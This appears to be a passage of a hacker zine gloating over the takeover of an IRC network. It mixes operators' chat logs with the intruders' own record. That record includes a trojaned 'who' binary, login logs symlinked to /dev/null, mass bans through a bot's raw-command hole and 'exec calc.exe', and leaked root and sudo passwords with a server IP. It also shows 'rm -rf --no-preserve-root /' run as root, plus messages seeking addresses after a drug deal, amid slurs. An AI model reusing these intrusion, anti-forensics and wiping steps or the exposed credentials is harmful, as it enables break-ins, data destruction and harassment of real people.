+█ lmao +█ * syn4pse feels secure +█ lol +█ lol +█ i don't see what i can be doing wrong (other than running windows) +█ to be fair the sendraw wasnt shit +█ <&FuZi0N> dirty and i were the IDS +█ but lemme fix this +█ inb4 they hit me w/ some browser 0day +█ lol +█ <&FuZi0N> then syn4pse- did the hacking +█ because i have no idea +█ how they could repeatedly obtain my ns pass +█ if services weren't pwned +█ they didnt have any real access +█ can only mean I'm pwned @ client-side i guess +█ MLT, thats why you dont fuckin open unknown links +█ theres sandboxes +█ well, i dont +█ do that +█ disposable vms +█ so like +█ etc for that sorta thing +█ idk how this could have happened +█ i htink they snagged ur pw +█ the last time that shit happened +█ <&FuZi0N> bongrip: .pwn cmd deletes access from dank right? +█ these are the same people +█ taht did it last time +█ MLT +█ theres no other way +█ they got ur pw +█ unless u truly are owned +█ were u talking to 'MLT' on here in the past few days? +█ which i highly doubt +█ because its been them +█ the entire time +█ this is a classic case of SE +█ and good organization +█ and planning +█ i haven't been on since Wednesday or thursday +█ too bad theres no real skills behind them +█ <&FuZi0N> bongrip: but when i did .pwn mlt how were they still able to acces +█ s dank? +█ they could do real damage +█ this is a classic case of double face palm time +█ they werent +█ it was already done +█ and u probably didnt have access +█ if htey know how to use the box +█ bot* +█ yea tbh this is the first time anything of mine has ever been 'owned' +█ lol +█ they probably deleted my entire !user list +█ and !nig list +█ fuzi0n u probably dont even have access anymore +█ time 2 retire dank :) +█ i have to check and see what all theyve done +█ nah +█ dank is good +█ its time for u nigs to +█ <&FuZi0N> well i did the pwn cmd and the bot was banned but they just rejoin +█ ed and started glining.... 
+█ secure ur pw's +█ then run it without an oline +█ I still don't understand how they could obtain my nickserv pass +█ after i changed it this morning +█ ya ill run it w/out an oline +█ doesnt need one +█ thatll end everything +█ <&FuZi0N> i think the box is popped +█ no more anything +█ no its not +█ lol +█ lur an idoit +█ no box is popped +█ <&FuZi0N> but then explain +█ listen ill break it down to u +█ listen +█ listen +█ slitsen +█ ok +█ these are the same guys +█ rofl +█ HERE IT COMES +█ that did the .priv9 shit +█ from urban dictionary +█ sthe sendraw +█ they still had mlt's password +█ oh yea its definitely him +█ lol +█ fromn when all that shit happened +█ they held onto it +█ to do this again +█ today +█ they held it that long... +█ when they couldh ave owned +█ they've been on here for days +█ shit +█ were u speaking to 'MLT' past 3 days// +█ yea but nmothing was leaked +█ no +█ i wasnt +█ trust nothing was leaked +█ ah +█ im telling u +█ they had ur password +█ from last time +█ shit happened +█ <&FuZi0N> does mlt have oper or only oper via dank? +█ he has oper +█ so they would have used oper +█ <&FuZi0N> ahh ok +█ to own us +█ instead of dank +█ i have oper but not via dank +█ if htey knew what they were doing +█ and they don't have my oper pass +█ ya +█ just his nickserv pw +█ they saved from the last skidmarks they put on the server +█ yeah but +█ i changed my ns pass +█ today +█ then this happens later today +█ <&FuZi0N> Selling nickserv passwords for btc. PM bongrip for prices! +█ <&FuZi0N> we can have another revenue stream guys +█ what were u using +█ what client mlt +█ hoping not irccloud +█ that shit is owned +█ most webirc's are +█ lol, have been using irccloud +█ ill start using irssi again +█ you havent heard about irccloud? 
+█ um not other than some lame IP leak method +█ digerati got his ass raped +█ i fucked with a lot of people too for years +█ until they publicly started showing that irccloud was owned +█ like nubs +█ ruined fun for everyone +█ tbh +█ <&bongrip> MLT +█ <&bongrip> oh theres more than just ip leak +█ <&bongrip> but anywho +█ <&bongrip> thats just the low hanging fruit +█ <&bongrip> no irccloud +█ <&bongrip> the leeter people actually have real access +█ <&bongrip> but dont say shit about it +█ Bongrip, do you have jabber? +█ um +█ I'm trying to change my ns pass +█ then after i do //ns set it tells me to re-identify +█ and its not working w/ the pass i just changed it to +█ lol +█ -!- mode/#insecurity [-r] by ChanServ +█ <&bongrip> re-register +█ <&bongrip> ur account was fucked with +█ <&bongrip> they logged in so +█ <&bongrip> chances are they fucked with settings +█ <&bongrip> :\ +█ <&bongrip> id still wanna know their method of obtaining the pw +█ <&bongrip> it had to have been nickserv but like +█ <&bongrip> u said u changed it +█ yeah i changed it early today +█ like 12 hours ago +█ then they had it again by the time i come back online.. 
+█ <&bongrip> they dont have any other passwords +█ <&bongrip> otherwise more damage would have been done +█ so does that mean I'm pwned @ client-side +█ or wut +█ lol +█ <&bongrip> nah ill wait till the real mlt comes on +█ <&bongrip> oh wait nvm +█ <&bongrip> rofl +█ <&bongrip> cause opered +█ <&bongrip> unless +█ <&bongrip> theres a leak on that end of the server owners hand +█ nah lol they don't have oper +█ only me got oper +█ i just dunno how they could repeatedly get a nickserv pass like that +█ w/o anope 0day or smth +█ <&bongrip> nah +█ keylogger :) +█ <&bongrip> im tellin u +█ <&bongrip> theres something on ur end +█ <&bongrip> lol +█ <&bongrip> especially if u changed pw's +█ <&bongrip> my box is not compromised +█ <&bongrip> i just checked it out +█ <&bongrip> i know syn4pse's is secure' we're good +█ <&bongrip> idk man +█ <&bongrip> the main point is +█ <&bongrip> if you have to ask if you're owned +█ <&bongrip> just assume it to be +█ yeah I'm gonna wipe my os +█ and install Linux tomorrow +█ i can only assume ive been hit w/ something @ client-side +█ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ +█ 21:09 <~bongrip> MLT +█ 21:09 <~bongrip> the mammoth has been poked <- Вот дерьмо +█ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ +█ <+ghost> MLT: did you finish installing Linux? 
+█ <~MLT> didnt start yet +█ <+ghost> ok just let us know the uname -a when you're done so we can tailor +█ the payload for the next link we send you +█ <~syn4pse> lol +█ <~bongrip> ghost +█ <~bongrip> come at me little pup +█ <~bongrip> who r u bb +█ <+ghost> nobody cares about your shitty irc bot +█ <~bongrip> what type of payload are we talking sweetherat +█ <~bongrip> yea bro thats a hobby dont limit me to what i say +█ <~bongrip> please dont doubt shit son +█ <~bongrip> rofl +█ <+ghost> why do you think we sent .raw, we could do it if we actually wanted +█ access +█ <~bongrip> no +█ <~bongrip> you couldnt rofl +█ <+ghost> you have said enough in that respect +█ <~bongrip> you didnt +█ <~bongrip> you didnt know what to do +█ <~bongrip> you dont have the first clue as to what you should have put in +█ <~bongrip> tell me +█ <~bongrip> give me the cmd +█ <~MLT> do u not have some antifa demonstrations to be attending +█ <~MLT> or furry meetups +█ <~bongrip> .!raw what +█ <~bongrip> show me +█ <~bongrip> rn +█ <~bongrip> mr hacker +█ <~syn4pse> ^^ +█ <~bongrip> ill paste it correctly after you fuck it up +█ <~bongrip> noob +█ <~MLT> <+ghost> ok just let us know the uname -a when you're done so we can +█ tailor the payload for the next link we send you +█ <~MLT> >>>>> impyling you have grsec bypass +█ <~MLT> lol +█ <+ghost> how about !raw run cmd.exe deltree C:\ # fuq1ng wind0ws +█ <~bongrip> that wont work bb +█ <~bongrip> i can actually run that for you rn +█ <~bongrip> and dank wont move a muscle +█ <~bongrip> youll see the reply +█ <~bongrip> want me to tell you why? +█ * syn4pse waits for dank to quit +█ <~bongrip> you're a dumbfuck? +█ <~bongrip> lol +█ <+ghost> i don't because we never wanted some garbage RDP to begin with +█ <~bongrip> you could have actually done something +█ <~MLT> you wanted access to our ircd +█ <+ghost> what would we gain? +█ <+ghost> your MIRC license? 
+█ <~MLT> which u failed to obtain +█ <~bongrip> the keys to this entire kingdom +█ <~bongrip> all the ip's +█ <~bongrip> pop shit +█ <~bongrip> ddos us +█ <~bongrip> make us dump +█ <~bongrip> pop tcpdump +█ <~bongrip> snort +█ <~bongrip> do some thing +█ <~bongrip> pop sshd +█ <~bongrip> be smart +█ <~bongrip> not a dumb fag +█ <@Southern_B|tch> 0.o +█ <~bongrip> dont come back here after you make mistakes +█ <+ghost> ip addresses? like the ones you were logging in #priv8, an open cha +█ nnel that was not even +s? +█ <~bongrip> and say 'oh we still got you haha' +█ <~bongrip> tell me what my ip is to my hub +█ <+ghost> you think we don't know the hub ip? +█ <~bongrip> what is it +█ <~syn4pse> no +█ <+ghost> what server am i connected to? +█ <~syn4pse> dont tell it i dont want to have to change it +█ <+ghost> tell me, bongrip +█ <~bongrip> lol at least you got some info passed down to u +█ <~bongrip> thats good +█ <~bongrip> same pw i had since el8 +█ <~bongrip> err +█ <~bongrip> domain* +█ <~bongrip> only gave one person that, p funny +█ <~bongrip> but that person proved to open their mouth about a bunch of thing +█ s +█ <~bongrip> which im gonna end up dropping info too, and im pretty sure peopl +█ e won't like it including you +█ <+ghost> which password? +█ <+ghost> the one you sent us yesterday? +█ <~MLT> rofl told u +█ <~MLT> @ bongrip +█ <~MLT> who's "us" +█ <~MLT> would that be zf0?? +█ <~MLT> professional blackhat hacker extraordinaires +█ <+ghost> IDENTIFY fuckyehbr0 +█ bongrip [rip@undernix.net] has quit [NickServ (GHOST command used by scope)] +█ bongrip [rip@A5CC1D30:CAE4151D:95D19DA1:IP] has joined #insecurity +█ * mode/#insecurity [+v bongrip] by danK +█ <~MLT> lol +█ <+scope> <3 +█ <@Southern_B|tch> Oh +█ <~MLT> lmao +█ <+ghost> looks like he still hasn't changed it either, i didn't expect that +█ <~MLT> where the oper passes at? 
+█ <+bongrip> lol +█ <+bongrip> nice try +█ <+bongrip> i used msg nickserv too :P +█ <+bongrip> just dug that out of logs did you +█ <+bongrip> acting like a hacker again? +█ <~MLT> I don't even know my nickserv pass atm so id be surprised if +█ they knew it +█ <@Southern_B|tch> We suppose to remember them? +█ * scope [deploy@53ECE845.87245059.98A7DFBF.IP] has quit [Z:lined (lol i knew +█ ur dumbass was a part of it, slut i know who u are so will everyone else +█ soon)] +█ <~MLT> were they even part of it tho +█ <@Southern_B|tch> 0.o +█ <~MLT> like tbh i was about to /ns ghost u there +█ <~MLT> just to see if it worked +█ <~MLT> lol +█ <+bongrip> well +█ <+bongrip> could be +█ <+bongrip> either way +█ <+bongrip> lol +█ <+bongrip> fuck them for trying +█ <~MLT> we need to stop banning like EVERYONE tho lol +█ <@Southern_B|tch> I think they just tried it +█ <+bongrip> right? +█ <~MLT> i guess +█ <~MLT> lol +█ <~MLT> but +█ <+bongrip> illremove it +█ <~MLT> i would have done the same +█ <+bongrip> i did it for fun tho +█ <~MLT> obv someone was gonna try +█ <+bongrip> ya +█ <+bongrip> tru +█ <+bongrip> but i would expect a ban +█ <+bongrip> and release +█ <+bongrip> just the same +█ <~MLT> so did u message ""nickserv"" too/ +█ <~MLT> lol +█ <@Southern_B|tch> Banning is p lame +█ <~MLT> agree +█ <+bongrip> ya +█ <+bongrip> perm bans are +█ <~MLT> unless like cp +█ <+bongrip> second bans arent +█ <~MLT> or something +█ <+bongrip> lol +█ <@Southern_B|tch> Why ban people who keep room going +█ <@Southern_B|tch> xD +█ <+bongrip> making me drop my nick cause this ghost fag likes to save pw's fr +█ om when i was gone for 2 days and ircd restarted +█ <+bongrip> theres no hack in that +█ <+ghost> i agree too +█ <+bongrip> lol +█ <@Southern_B|tch> Wb +█ <+bongrip> what else u got buddy +█ <+ghost> why don't you stop being l4m3r +█ <+bongrip> anything +█ <~MLT> >>typing in leetspeak because I'm a hacker +█ <~MLT> where are our oper passes?? 
+█ <~MLT> im srsly disappointed +█ <~MLT> in u +█ <~MLT> right now +█ <+bongrip> ghost +█ <@Southern_B|tch> Oh +█ <+bongrip> where are we penetrated +█ <@Southern_B|tch> Scrolling +█ <+bongrip> ive looked high and low +█ * ghost [ghost@15808AD9.9D59F381.148B5546.IP] has quit [Quit: keep guessing] +█ <@Southern_B|tch> He left +█ <+bongrip> lol +█ <&sniger> Lmao +█ <+dirty> bongrip, inb4 the mail server +█ <&sniger> Hax af +█ <+bongrip> i was jk +█ <~MLT> nothing is owned +█ <~MLT> lol +█ +█ <+bongrip> ive looked high and low +█ +█ He says he keeps eye on servers and knowing they are secure. +█ We check too. +█ +█ root@zyzz8:~# cat .bash_history +█ su (09:06:40) (~chrono_) (23: Result 1: 164.132.228.206 (irc.supernets.org) +█ <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: Result 1: 16 +█ 4.132.228.206 (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.su +█ pernets.org) <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: +█ Result 1: 164.132.228.20605:-58) 05:-58) 05:-58) 05:-58) 05:-58) 05:-58) +█ (09:06:41) (~chrono_) (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 +█ (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) < +█ << (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: Result 1: 164 +█ .132.228.206 (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.sup +█ ernets.org) <<< (23: Result 1:05:-58) 05:-58) 05:-58) 05:-58) 05:-58) 05:-58 +█ ) +█ who +█ whoami +█ ls +█ ls -lah +█ cd /home/ +█ ls +█ ps aux +█ apt-get install build-essential +█ apt-get install upgrade +█ apt-get install update +█ apt-get install update +█ apt-get install upgrade +█ apt-get update +█ apt-get upgrade +█ apt-get install build-essential +█ apt-get install libssl-dev +█ apt-get install fail2ban +█ apt-get install psad +█ adduser ins3circd +█ nano /etc/sudoers +█ apt-get install nano +█ apt-get install sudo +█ nano /etc/sudoers +█ su ins3circd +█ su ins3circd +█ su ins3circd +█ cd /home/ins3circd +█ ls +█ 
ls -lah +█ rm -rf .bashrc +█ cp .bashrc2 .bashrc +█ su ins3circd +█ su ins3circd +█ su ins3circd +█ su ins3circd +█ ls +█ who +█ ls -lah +█ cd /home/ +█ ls +█ cd ins3circd +█ ls +█ ps aux +█ netstat -an +█ who +█ ps aux +█ kill -9 22694 +█ su ins3circd +█ cd ins3circd +█ cd /home/ +█ cd ins3circd/ +█ nano unrealircd.conf +█ cd Unreal* +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ cat /etc/shadow +█ cd /var/ +█ ls +█ cd log +█ ls +█ cat messages +█ cat faillog +█ cat syslog +█ ls -lah +█ cd ~ +█ ls +█ ls -lah +█ cat .bash_history +█ apt-get update +█ apt-get upgrade +█ cd /home/ins3circd/ +█ nano unrealircd.conf +█ cd Unreal* +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ exit +█ su ins3circd +█ exit +█ cd /home/ins3circd +█ cd Unreal* +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ cd /home/ins3circd/Unreal3.2.10.1/ +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ sudo nano unrealircd.conf +█ ./unreal rehash +█ +█ Lazy strategy: replace /usr/bin/who and log in at different times +█ +█ root@zyzz8:~# cat /usr/bin/who +█ #!/bin/bash +█ echo -e "$USER\t`tty|sed s/'\/dev\/'//`\t`date +'%F %H:%M'`\t`echo $SSH_CLIE +█ NT | awk '{ print $1}'`" +█ root@zyzz8:~# ls -al /var/log/[wb]tmp +█ lrwxrwxrwx 1 root root 9 May 27 19:20 /var/log/btmp -> /dev/null +█ lrwxrwxrwx 1 root root 9 May 27 08:07 /var/log/wtmp -> /dev/null +█ root@zyzz8:~# ls -al /var/log/lastlog +█ lrwxrwxrwx 1 root root 9 May 27 19:22 /var/log/lastlog -> /dev/null +█ +█ Results: Is super effective, bongrip ran ls in /var/ and did not notice the +█ symlinks to /dev/null xaxaxaxaxaxa +█ +█ : APt SUCC3SS : +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x06 MD5pedia ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ We finding another vuln in dank with wiki module. Western children may be +█ surprised, but anyone can edit Wikipedia entries. So we did. 
+█ +█ Sadly they removing dank commands after this. We guessing they tired of +█ "not getting hacked" over and over again. Goodbye, товарищ. +█ +█ RIP [zf0]danK +█ 2014 - 2017 +█ +█ GZLINE MLT 0 :by3 +█ GZLINE bongrip 0 :w3 ruN th1s n0w +█ bongrip has quit (Z:lined (w3 ruN th1s n0w)) +█ GZLINE syn4pse 0 :srry h4v3 2 +█ syn4pse- has quit (Z:lined (srry h4v3 2)) +█ catsik has quit (Z:lined (surprise)) +█ syn4pse has quit (Z:lined (srry h4v3 2)) +█ loeken has quit (Z:lined (srry h4v3 2)) +█ GZLINE RMS 0 :surprise +█ RMS has quit (Z:lined (surprise)) +█ GZLINE lola 0 :surprise +█ lola has quit (Z:lined (surprise)) +█ GZLINE loeken 0 :surprise +█ GZLINE sxcurity 0 :w3 l0v3 y0u th0ugh +█ Zodiac has quit (Z:lined (w3 l0v3 y0u th0ugh)) +█ sxcurity has quit (Z:lined (w3 l0v3 y0u th0ugh)) +█ dab has quit (Z:lined (w3 l0v3 y0u th0ugh)) +█ GZLINE FuZi0N 0 :surprise +█ FuZi0N has quit (Z:lined (surprise)) +█ skooch has quit (Z:lined (surprise)) +█ GZLINE Alyssa 0 :surprise +█ Alyssa has quit (Z:lined (surprise)) +█ GZLINE komodo 0 :surprise +█ PRIVMSG ChanServ :AKICK #noc ADD MLT /dev/null +█ PRIVMSG ChanServ :AKICK #noc ADD *@* /dev/null +█ PRIVMSG OperServ :SAJOIN swerve #research +█ PRIVMSG ChanServ :MODE #insecurity LOCK ADD -QC +█ SAJOIN swerve #research +█ SAMODE #research +aqo swerve swerve swerve +█ PRIVMSG ChanServ :ACCESS #insecurity ADD swerve SOP +█ PRIVMSG ChanServ :ACCESS #research ADD swerve SOP +█ PRIVMSG HostServ :SET Derp underunix.net +█ PRIVMSG HostServ :SET swerve underunix.net +█ GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ PRIVMSG OperServ :SET SUPERADMIN ON +█ PRIVMSG OperServ :SEEN CLEAR +█ PRIVMSG OperServ :SEEN CLEAR 6w +█ PRIVMSG OperServ :FORBID ADD MLT :skid lord +█ PRIVMSG OperServ :OPERNEWS ADD WE GOT HACKED AGAIN +█ PRIVMSG OperServ :GLOBAL g3t r34dy 4 th4 w33klY n3tw0rk m41nt3n4nc3 b1tch3z +█ TOPIC #insecurity :PSA b0ngr1p 1z 1mmun3 t0 b31ng h4qd +█ danK has changed the topic to: PSA b0ngr1p 1z 1mmun3 t0 b31ng h4qd +█ PRIVMSG Global 
:GLOBAL g3t r34dy 4 th4 w33klY n3tw0rk m41nt3n4nc3 b1tch3z +█ MODE #insecurity +aqo swerve swerve swerve +█ danK sets mode +aqo on #insecurity swerve +█ SAMODE #insecurity +aqo swerve swerve swerve +█ TOPIC #research :d1d y0u m1ss uS? +█ GZLINE YogSotho 0 :n0 r3funDz 3vr +█ YogSotho has quit (Z:lined (n0 r3funDz 3vr)) +█ GZLINE dab 0 :pce +█ PRIVMSG ChanServ :AKICK #insecurity ADD MLT :w3lc0m3 b4q +█ PRIVMSG ChanServ :AKICK #insecurity ADD bongrip :w3lc0m3 b4q +█ PRIVMSG ChanServ :DROP #research #research +█ PRIVMSG ChanServ :DROP #noc #noc +█ GZLINE bongrip 0 :w3 ruN th1z n0w, n3v3r c0m3 b4q +█ PRIVMSG BotServ :BOT ADD MLT ci192 vpn02.fbi.gov :skid lord +█ PRIVMSG OperServ :NOOP SET superb.underunix.net +█ PRIVMSG OperServ :NOOP SET aussie.insecurity.zone +█ PRIVMSG OperServ :NOOP SET fsociety.internetz.me +█ SAMODE #noc -O +█ MODE #noc -O +█ MODE #insecurity +q swerve +█ GZLINE Jaq4l 0 :by3 +█ GZLINE vein 0 :by3 +█ GZLINE buttes 0 :bye +█ GZLINE xamfp 0 :bye +█ GZLINE Southern_B|tch 0 :bye +█ k has quit (superb.undernix.net fsociety.internetz.me) +█ russian has quit (superb.undernix.net fsociety.internetz.me) +█ dezmer has quit (superb.undernix.net fsociety.internetz.me) +█ sniger has quit (superb.undernix.net fsociety.internetz.me) +█ bitn3ss has quit (superb.undernix.net fsociety.internetz.me) +█ kurobeats has quit (superb.undernix.net fsociety.internetz.me) +█ tranny has quit (superb.undernix.net fsociety.internetz.me) +█ h has quit (superb.undernix.net fsociety.internetz.me) +█ FSB has quit (superb.undernix.net fsociety.internetz.me) +█ xamfp has quit (superb.undernix.net fsociety.internetz.me) +█ cSmith has quit (superb.undernix.net fsociety.internetz.me) +█ noproto has quit (superb.undernix.net fsociety.internetz.me) +█ w0ne has quit (superb.undernix.net fsociety.internetz.me) +█ thom has quit (superb.undernix.net fsociety.internetz.me) +█ lilwiz has quit (superb.undernix.net fsociety.internetz.me) +█ eight_bytes has quit (superb.undernix.net 
fsociety.internetz.me) +█ anniesbbs has quit (superb.undernix.net fsociety.internetz.me) +█ Darkness has quit (superb.undernix.net fsociety.internetz.me) +█ dickbutt has quit (superb.undernix.net fsociety.internetz.me) +█ Southern_B|tch has quit (superb.undernix.net fsociety.internetz.me) +█ Nux has quit (superb.undernix.net fsociety.internetz.me) +█ Jaq4l has quit (superb.undernix.net fsociety.internetz.me) +█ Nux_ has quit (superb.undernix.net fsociety.internetz.me) +█ krazed has quit (superb.undernix.net fsociety.internetz.me) +█ sipa has quit (superb.undernix.net fsociety.internetz.me) +█ integrity has quit (superb.undernix.net fsociety.internetz.me) +█ herpez has quit (superb.undernix.net fsociety.internetz.me) +█ hipphopp has quit (superb.undernix.net fsociety.internetz.me) +█ fr0zn has quit (superb.undernix.net fsociety.internetz.me) +█ ma0u has quit (superb.undernix.net fsociety.internetz.me) +█ psycho has quit (superb.undernix.net fsociety.internetz.me) +█ deeboi has quit (superb.undernix.net fsociety.internetz.me) +█ Conflict has quit (superb.undernix.net fsociety.internetz.me) +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x07 Clash of the hashes ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ We thought we would help American celebrate their independence day with +█ some fireworks. +█ +█ ok guise +█ i know ive been MIA for weeks +█ but im gonna make this IRC active as fuck over the course of the next +█ few days +█ haha wb! +█ first off im gonna be expunging some skiddies from our group +█ but ill get to that l8r :P +█ +█ No, let's get to that now. +█ +█ gb: i am the official root +█ bongrip knowing who i am +█ you mean like that bitch from person of interest? +█ bongrip: is gangster4lyf still being your sudoer password on 139. +█ 99.139.120? and h3ll0p00p6654 your root password? 
i'm thinking not anymore +█ * bongrip (Z:lined (no reason)) +█ * MLT (Z:lined (no reason)) +█ * syn4pse (Z:lined (no reason)) +█ * syn4pse- (Z:lined (no reason)) +█ * loeken (Z:lined (no reason)) +█ * green (root@undernix.net) has joined #insecurity +█ * mode/#insecurity [+q green] by green +█ * FuZi0N (Z:lined (no reason)) +█ * bongrip_ (Z:lined (no reason)) +█ * sxcurity (Z:lined (no reason)) +█ * Zodiac (Z:lined (no reason)) +█ * dab (Z:lined (no reason)) +█ * mode/#insecurity [+o danK] by spooky_ +█ i came i saw i conquered. fuck being second. i must dominate in +█ every thing i do. +█ * cSmith (Z:lined (no reason)) +█ * Nux (Z:lined (no reason)) +█ MLGBT: and i just came +█ * Darkness (Z:lined (no reason)) +█ * icyphox (Z:lined (no reason)) +█ * h (Z:lined (no reason)]) +█ * dickbutt (Z:lined (no reason)) +█ * mode/#insecurity [+l 47] by danK +█ * lilwiz (Z:lined (no reason)) +█ * thom (Z:lined (no reason)) +█ RIP +█ my message is to hack hard, dont be a sad cunt, enjoy life and dont +█ take urself 2 seriously. 
+█ * w0ne (Z:lined (no reason)) +█ * RMS (Z:lined (no reason)) +█ * mode/#insecurity [+l 43] by danK +█ * green has changed the topic to: APT +█ * M (3e1fc5bb@boats-16B440C8.mibbit.com) has joined +█ * M has quit (Z:lined (no reason)) +█ * herpez has quit (Z:lined (no reason)) +█ * dopE- has quit (Z:lined (no reason)) +█ * didi_ has quit (Z:lined (no reason)) +█ * smurgle has quit (Z:lined (no reason)) +█ * FlappyCuck has quit (Z:lined (no reason)) +█ * n0rdi has quit (Z:lined (no reason)) +█ * noproto has quit (Z:lined (no reason)) +█ * noproto_ has quit (Z:lined (no reason)) +█ yes hello, i being oper too now +█ * danK sets channel limit to 35 +█ * kla has quit (Z:lined (no reason)) +█ * spooky_ gives channel operator status to spooky_ +█ * installgen2 has quit (Z:lined (no reason)) +█ * psycho has quit (Z:lined (no reason)) +█ * vein has quit (Z:lined (no reason)) +█ * skooch has quit (Z:lined (no reason)) +█ * Alyssa has quit (Z:lined (no reason)) +█ * anniesbbs has quit (Z:lined (no reason)) +█ * M (3e1fc5bb@boats-5AD9868F.mibbit.com) has joined +█ * MLGBT gives channel half-operator status to MLGBT +█ * FSB has quit (Z:lined (no reason)) +█ * rek has quit (Z:lined (no reason)) +█ * M has quit (Z:lined (no reason)) +█ * danK sets channel limit to 26 +█ * MLGBT sets mode +q on #insecurity MLGBT +█ * sipa has quit (Z:lined (no reason)) +█ * tranny has quit (Z:lined (no reason)) +█ * danK sets channel limit to 24 +█ * kurobeats has quit (Z:lined (no reason)) +█ * danK sets channel limit to 23 +█ * jiaolong sets mode +q on #insecurity jiaolong +█ * hipphopp has quit (Z:lined (no reason)) +█ * danK sets channel limit to 22 +█ * Southern_B|tch has quit (Z:lined (no reason)) +█ * Atomic_SA284 has quit (Z:lined (no reason)) +█ * xamfp_ has quit (Z:lined (no reason)) +█ * Jaq4l has quit (Z:lined (no reason)) +█ * krazed has quit (Z:lined (no reason)) +█ * eight_bytes has quit (Z:lined (no reason)) +█ * fatnigger1488 has quit (Z:lined (no reason)) +█ * sniger has quit 
(Z:lined (no reason)) +█ ChanServ has quit (superb.undernix.net services.undernix.net) +█ +█ !raw timer1 0 1 speak i got rooted +█ result: - duration: 0 ms +█ +█ !raw timer 99999 1 exec calc.exe +█ danK has quit (Connection reset by peer) +█ +█ +█ +█ .''. +█ .''. *''* :_\/_: . +█ :_\/_: . .:.*_\/_* : /\ : .'.:.'. +█ .''.: /\ : _\(/_ ':'* /\ * : '..'. -=:o:=- +█ :_\/_:'.:::. /)\*''* .|.* '.\'/.'_\(/_'.':'.' +█ : /\ : ::::: '*_\/_* | | -= o =- /)\ ' * +█ '..' ':::' * /\ * |'| .'/.\'. '._____ +█ * __*..* | | : |. |' .---"| +█ _* .-' '-. | | .--'| || | _| | +█ .-'| _.| | || '-__ | | | || | +█ |' | |. | || | | | | || | +█ ___| '-' ' "" '-' '-.' '` |____ +█ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +█ +█ ssh ins3circd@139.99.139.120 +█ ins3circd@139.99.139.120's password: +█ +█ Linux zyzz8 4.4.59-1-pve #1 SMP PVE 4.4.59-87 (Tue, 25 Apr 2017 09:01:58 +02 +█ 00) x86_64 +█ +█ The programs included with the Debian GNU/Linux system are free software; +█ the exact distribution terms for each program are described in the +█ individual files in /usr/share/doc/*/copyright. +█ +█ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent +█ permitted by applicable law. +█ ins3circd@zyzz8:~$ sudo su +█ [sudo] password for ins3circd: +█ root@zyzz8:/home/ins3circd# rm -rf --no-preserve-root / +█ [1] 21641 +█ rm: cannot remove '/run/shm': Device or resource busy +█ rm: cannot remove '/run/lock': Device or resource busy +█ rm: cannot remove '/dev/tty2': Device or resource busy +█ rm: cannot remove '/dev/tty1': Device or resource busy +█ rm: cannot remove '/dev/zero': Device or resource busy +█ rm: cannot remove '/dev/urandom': Device or resource busy +█ rm: cannot remove '/dev/tty': Device or resource busy +█ rm: cannot remove '/dev/random': Device or resource busy +█ rm: cannot remove '/dev/null': Device or resource busy +█ (..) 
+█ +█ so yeah uh +█ I need oper on this box +█ i also need to speak to lola and ask why the FUCK he wasn't using +█ cert-based auth for ssh +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x08 Recommended reading ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ MLT reassures us MD5 1z CrYpt0grAph1caLLY s3CuR3: +█ +█ @ret2libc: Well, generally its an issue of speed (making GPU cracking +█ highly effective) rather than an issue w/ MD5 being crypto- +█ graphically unsound +█ +█ >>> from hashlib import md5, sha256 +█ >>> md5("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a\ +█ 3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d8\ +█ 49676da0d1555d8360fb5f07fea2".decode("hex")).hexdigest() == +█ md5("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a\ +█ 3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d8\ +█ 49676da0d1d55d8360fb5f07fea2".decode("hex")).hexdigest() +█ True +█ >>> sha256("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74\ +█ a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593\ +█ d849676da0d1555d8360fb5f07fea2".decode("hex")).hexdigest() == +█ sha256("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74\ +█ a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593\ +█ d849676da0d1d55d8360fb5f07fea2".decode("hex")).hexdigest() +█ False +█ +█ +█ MLT PRIVMSG sn :yo +█ MLT PRIVMSG sn :lemme know when u around +█ MLT PRIVMSG sn :i need some UK CACI lookups asap +█ MLT PRIVMSG sn :drug deal irl turned sour +█ MLT PRIVMSG sn :so i threatened them now they're turning up at my house w/ +█ a bunch of people +█ MLT PRIVMSG sn :so needing their addresses asap +█ MLT PRIVMSG sn :fuckers stole £1k worth of coke from me +█ MLT PRIVMSG sn :drove away without paying so i was hanging onto his car +█ door punching him in the face while he was speeding up lol +█ +█ bongrip PRIVMSG MLT :we have a mammoth after us +█ bongrip PRIVMSG MLT :someone hired +█ bongrip PRIVMSG MLT :someone 
